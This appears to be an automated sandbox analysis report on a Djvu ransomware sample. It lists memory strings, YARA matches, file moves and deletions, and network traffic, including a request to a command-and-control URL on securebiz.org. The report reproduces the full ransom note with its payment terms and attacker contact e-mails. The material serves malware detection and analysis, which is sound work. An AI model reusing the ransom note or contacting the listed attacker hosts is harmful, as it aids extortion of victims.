          Source: NZPC0PFaC0.exe, 00000010.00000003.377181082.0000000003500000.00000004.00000010.sdmpString found in binary or memory: http://www.wikipedia.com/
          Source: NZPC0PFaC0.exe, 00000010.00000003.377220530.0000000003500000.00000004.00000010.sdmpString found in binary or memory: http://www.youtube.com/
          Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/
          Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua//Wjn
          Source: NZPC0PFaC0.exe, NZPC0PFaC0.exe, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000003.365995689.00000000007A2000.00000004.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
          Source: NZPC0PFaC0.exe, 0000000A.00000002.332958697.0000000000890000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonC
          Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonS
          Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
          Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsont
          Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonyZ3
          Source: NZPC0PFaC0.exe, 00000010.00000002.554664227.000000000078F000.00000004.00000020.sdmpString found in binary or memory: https://we.tl/t-1JwFK5rT
          Source: NZPC0PFaC0.exe, 00000010.00000002.554723819.00000000007A9000.00000004.00000020.sdmp, _readme.txt0.16.drString found in binary or memory: https://we.tl/t-1JwFK5rT39
          Source: unknownDNS traffic detected: queries for: api.2ip.ua
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,5_2_0040CF10
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: securebiz.org
          Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49750 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49752 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49753 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49756 version: TLS 1.2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,10_2_004822E0

          Spam, unwanted Advertisements and Ransom Demands:

          barindex
          Found ransom note / readmeShow sources
          Source: C:\Users\user\AppData\Local\VirtualStore\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-1JwFK5rT39Price of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:manager@mailtemp.chReserve e-mail address to contact us:supporthelp@airmail.ccYour personal ID:0336gSd743daN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkwJump to dropped file
          Yara detected Djvu RansomwareShow sources
          Source: Yara matchFile source: 12.2.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.NZPC0PFaC0.exe.7c15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NZPC0PFaC0.exe.8415a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.NZPC0PFaC0.exe.8c15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.NZPC0PFaC0.exe.8415a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.NZPC0PFaC0.exe.8415a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.NZPC0PFaC0.exe.8b15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.1.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.1.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.NZPC0PFaC0.exe.7c15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.1.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.NZPC0PFaC0.exe.8b15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.1.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NZPC0PFaC0.exe.8415a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.1.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.1.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.NZPC0PFaC0.exe.8c15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.348927479.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.347226816.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.553605048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: NZPC0PFaC0.exe PID: 4332, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NZPC0PFaC0.exe PID: 752, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NZPC0PFaC0.exe PID: 5344, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NZPC0PFaC0.exe PID: 1376, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NZPC0PFaC0.exe PID: 7112, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NZPC0PFaC0.exe PID: 4340, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NZPC0PFaC0.exe PID: 5608, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NZPC0PFaC0.exe PID: 6880, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NZPC0PFaC0.exe PID: 1308, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NZPC0PFaC0.exe PID: 7044, type: MEMORYSTR
          Modifies existing user documents (likely ransomware behavior)Show sources
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docxJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile deleted: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docxJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.jpgJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile deleted: C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.jpgJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ\PWCCAWLGRE.pdfJump to behavior
          Source: NZPC0PFaC0.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 12.2.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 8.2.NZPC0PFaC0.exe.7c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 13.2.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 10.1.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.NZPC0PFaC0.exe.8415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 5.2.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 11.2.NZPC0PFaC0.exe.8c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 10.1.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 9.2.NZPC0PFaC0.exe.8415a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 9.2.NZPC0PFaC0.exe.8415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 10.2.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 14.2.NZPC0PFaC0.exe.8b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 13.1.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 12.2.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 12.1.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 8.2.NZPC0PFaC0.exe.7c15a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 16.1.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 5.2.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 14.2.NZPC0PFaC0.exe.8b15a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 16.2.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 12.1.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.NZPC0PFaC0.exe.8415a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 16.2.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 16.1.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 5.1.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 10.2.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 13.1.NZPC0PFaC0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 13.2.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 11.2.NZPC0PFaC0.exe.8c15a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 5.1.NZPC0PFaC0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0000000D.00000002.348927479.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0000000C.00000002.347226816.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 00000010.00000002.553605048.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0040A46B1_2_0040A46B
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0040DC171_2_0040DC17
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0040E4C01_2_0040E4C0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0040E8CC1_2_0040E8CC
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0040E0EC1_2_0040E0EC
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0040ECEC1_2_0040ECEC
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_004119B21_2_004119B2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00414E6E1_2_00414E6E
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00407AEA1_2_00407AEA
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00411EF61_2_00411EF6
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00412FF21_2_00412FF2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0084B0B01_2_0084B0B0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_008500D01_2_008500D0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_008618D01_2_008618D0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_008430EE1_2_008430EE
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0084B0001_2_0084B000
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0086E9A31_2_0086E9A3
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0086F9B01_2_0086F9B0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0084CA101_2_0084CA10
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0084DBE01_2_0084DBE0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_00850B001_2_00850B00
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0084E6E01_2_0084E6E0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0084C7601_2_0084C760
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040D2405_2_0040D240
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00419F905_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040C0705_2_0040C070
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0042E0035_2_0042E003
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0042F0105_2_0042F010
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_004101605_2_00410160
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0044237E5_2_0044237E
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_004344FF5_2_004344FF
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0043E5A35_2_0043E5A3
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0044B5B15_2_0044B5B1
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040A6605_2_0040A660
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0041E6905_2_0041E690
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040274E5_2_0040274E
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040A7105_2_0040A710
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040F7305_2_0040F730
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0044D7A15_2_0044D7A1
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0042C8045_2_0042C804
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0044D9DC5_2_0044D9DC
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00449A715_2_00449A71
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00443B405_2_00443B40
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0044ACFF5_2_0044ACFF
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040DD405_2_0040DD40
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040BDC05_2_0040BDC0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0042CE515_2_0042CE51
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00420F305_2_00420F30
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00449FE35_2_00449FE3
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_1_0040D2405_1_0040D240
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_1_00419F905_1_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_1_0040C0705_1_0040C070
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_1_0042E0035_1_0042E003
